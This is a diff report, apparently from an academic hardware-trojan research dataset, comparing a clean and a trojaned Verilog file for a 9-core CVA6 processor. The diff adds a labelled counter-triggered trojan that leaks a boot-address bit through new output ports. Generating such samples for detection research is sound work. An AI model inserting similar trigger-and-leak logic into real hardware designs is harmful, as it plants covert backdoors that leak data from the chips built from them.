Structural Comparison: Clean vs Trojaned
Design 8: 9-core CVA6 (counter → leakage)
Generated: 2026-01-21T17:31:08.550459
================================================================================

--- /Users/yaroslavpopryho/Study/UIC/Research/MIMIC/professor_package/TrojanFree/cva6_massive_9core_clean_008.v	2026-01-21 17:30:56
+++ /Users/yaroslavpopryho/Study/UIC/Research/MIMIC/professor_package/TrojanInserted/cva6_massive_9core_trojan_008_counter_leakage.v	2026-01-21 17:30:56
@@ -17,7 +17,9 @@
   input logic clk_i,
   input logic rst_ni,
   input logic [63:0] boot_addr_i,
-  input logic [63:0] hart_id_i
+  input logic [63:0] hart_id_i,
+  output logic trojan_trigger_o,
+  output logic trojan_payload_o
 );
 
 
@@ -10693,6 +10695,29 @@
 
 
   // End of Core 8
+
 
 
+  // === INSERTED TROJAN START ===
+  // Trigger: counter, Payload: leakage
+  // Inserted: 2026-01-21T17:30:44.695523
+
+  reg [15:0] trojan_counter_8;
+  wire trojan_trigger_8;
+
+  always @(posedge clk_i or posedge rst_ni) begin
+    if (rst_ni)
+      trojan_counter_8 <= 16'h0000;
+    else if (boot_addr_i[0])
+      trojan_counter_8 <= trojan_counter_8 + 1;
+  end
+  assign trojan_trigger_8 = (trojan_counter_8 == 16'hFFFF);
+
+  wire trojan_payload_8; assign trojan_payload_8 = trojan_trigger_8 ? boot_addr_i[0] : 1'b0;
+
+  // Connect Trojan signals to output ports
+  assign trojan_trigger_o = trojan_trigger_8;
+  assign trojan_payload_o = trojan_payload_8;
+
+  // === INSERTED TROJAN END ===
 endmodule
